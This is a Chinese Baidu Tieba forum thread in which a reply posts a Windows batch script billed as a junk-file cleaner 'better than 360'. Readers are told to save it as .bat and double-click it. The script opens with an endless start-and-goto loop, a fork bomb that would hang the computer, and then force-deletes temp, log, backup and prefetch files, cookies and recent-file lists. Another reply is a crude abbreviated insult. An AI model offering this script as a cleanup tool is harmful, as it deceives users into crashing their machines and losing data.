新手冒个泡,亲,求保护额。
李毅吧
全部回复
仅看楼主
level 11
2012年11月27日 13点11分 1
level 7
Qnmlgb
2012年11月27日 13点11分 7
甚么意思 ?
2012年11月28日 03点11分
level 12
[啊!]
2012年11月28日 03点11分 8
level 7
:2
start
goto 2
echo 正在清除系统垃圾文件,请稍等......
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recy
cled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
echo 清除系统垃圾完成!
echo. & pause
把这个粘贴到文本文档里,把后缀改成.bat格式,然后双击运行即可,清扫效率完爆360什么的
2012年11月28日 03点11分 9
1